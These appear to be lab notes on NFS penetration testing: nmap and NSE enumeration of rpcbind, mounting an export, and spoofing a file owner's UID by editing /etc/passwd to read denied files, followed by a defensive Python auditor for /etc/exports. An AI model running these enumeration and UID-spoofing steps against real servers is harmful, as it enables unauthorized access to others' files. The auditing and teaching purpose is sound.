NFS

Background:

Network File System: allows a user on a client computer to access files over a computer network as if they were on locally-mounted storage.

Portmapper and rpcbind: run on TCP port 111. rpcbind maps RPC services to the ports on which they listen. RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve. A client contacts rpcbind on the server with a particular RPC program number, and rpcbind redirects it to the proper port (for NFS, usually TCP port 2049) so it can talk to the requested service. We can scan these ports with nmap using the syntax below.

Scans:

Scan for NFS open:
#nmap -v -p 111 10.11.1.1-254

rpcinfo to find services that may have registered with rpcbind:
#nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap NSE scripts for NFS:
#nmap -p 111 --script nfs* 10.11.1.72

If the scan result shows a directory we can mount, the syntax is:
#mount -o nolock 10.11.1.72:/home ~/home/ //-o nolock disables file locking
#cd home/ && ls

We got denied the file read, so we try adding a user with the same UID, 1014.
#sudo adduser pwn //the new user is automatically assigned UID 1001, so we need to change it to 1014 to read the file
#sudo sed -i -e 's/1001/1014/g' /etc/passwd //-i in-place replace, -e execute script
Check with:
#cat /etc/passwd | grep pwn
#su pwn
#id
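The UID trick above works because an export served with the default AUTH_SYS security flavor trusts whatever UID/GID the client asserts. The following is an added example (not part of the original notes) showing the server-side check a defender would run: it parses /etc/exports text, flags the settings that make an export open to this (wildcard clients, no_root_squash, insecure, AUTH_SYS without all_squash) and proposes a hardened option set. The export lines inside it are constructed for the demo and are not taken from any real host.

```python
"""Audit /etc/exports entries for options that let an NFS client pick its own
identity or reach the export from anywhere. Added example with constructed
sample data; the heuristics follow exports(5) defaults (ro, root_squash,
secure and sec=sys unless stated otherwise)."""
import re
from typing import Dict, List, Set

# Constructed sample /etc/exports content: one weak export, two hardened ones,
# and one that only relies on hostname wildcards.
SAMPLE_EXPORTS = """\
# constructed example, not a real configuration
/home         *(rw,sync,no_root_squash,insecure)
/srv/share    10.11.1.0/24(rw,sync,root_squash,sec=krb5p)
/backup       192.168.5.7(ro,sync,all_squash,anonuid=65534,anongid=65534)
/data         *.example.com(rw,sync)
"""

# "host(opt,opt)" with an optional option list; a bare "(opts)" means every host.
SPEC_RE = re.compile(r'([^(]*)(?:\(([^)]*)\))?')


def parse_exports(text: str) -> List[dict]:
    """Parse exports text into {path, host, options} records, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        specs = parts[1].split() if len(parts) > 1 else ['*']
        for spec in specs:
            m = SPEC_RE.fullmatch(spec)
            if not m:
                continue                       # malformed spec, skip it
            host = m.group(1) or '*'           # no host given: applies to everyone
            opts = set(filter(None, (m.group(2) or '').split(',')))
            entries.append({'path': path, 'host': host, 'options': opts})
    return entries


def security_flavors(opts: Set[str]) -> List[str]:
    """Return the sec= flavors in effect; NFS defaults to AUTH_SYS ('sys')."""
    for opt in opts:
        if opt.startswith('sec='):
            return opt[4:].split(':')
    return ['sys']


def audit_entry(entry: dict) -> List[str]:
    """Return human-readable findings for one export/client pair."""
    host, opts = entry['host'], entry['options']
    findings = []
    if host == '*' or host.startswith('*'):
        findings.append('wildcard client spec: any host that can reach the server may mount it')
    if 'no_root_squash' in opts:
        findings.append('no_root_squash: client root keeps root privileges on the export')
    if 'insecure' in opts:
        findings.append('insecure: mount requests from unprivileged source ports are accepted')
    if 'sys' in security_flavors(opts) and 'all_squash' not in opts:
        findings.append('AUTH_SYS without all_squash: server trusts the UID/GID the client asserts')
    return findings


def audit_exports(text: str) -> Dict[str, List[str]]:
    """Map '<path> <host>' to its findings for every entry in the exports text."""
    return {f"{e['path']} {e['host']}": audit_entry(e) for e in parse_exports(text)}


def hardened_options(opts: Set[str]) -> List[str]:
    """Suggest a hardened option list: squash root, drop 'insecure', and require
    a Kerberos flavor (krb5p assumed here) instead of AUTH_SYS. The client spec
    itself (wildcard vs. specific hosts) still has to be tightened by hand."""
    kept = {o for o in opts
            if o not in ('no_root_squash', 'insecure') and not o.startswith('sec=')}
    kept.add('root_squash')
    flavors = [f for f in security_flavors(opts) if f != 'sys']
    kept.add('sec=' + ':'.join(flavors or ['krb5p']))
    return sorted(kept)


if __name__ == '__main__':
    for key, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(key, '->', '; '.join(findings) or 'no findings')
```

Run it against a copy of a real /etc/exports by swapping SAMPLE_EXPORTS for the file contents; an export with no findings still deserves a look at which hosts it is exported to, since the script only flags wildcards, not overly broad CIDR ranges.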

NSE Scripts:

nfs-ls: Attempts to get useful information about files from NFS exports. The output is intended to resemble the output of ls.

nfs-showmount: Shows NFS exports, like the showmount -e command.

nfs-statfs: Retrieves disk space statistics and information from a remote NFS share. The output is intended to resemble the output of df.
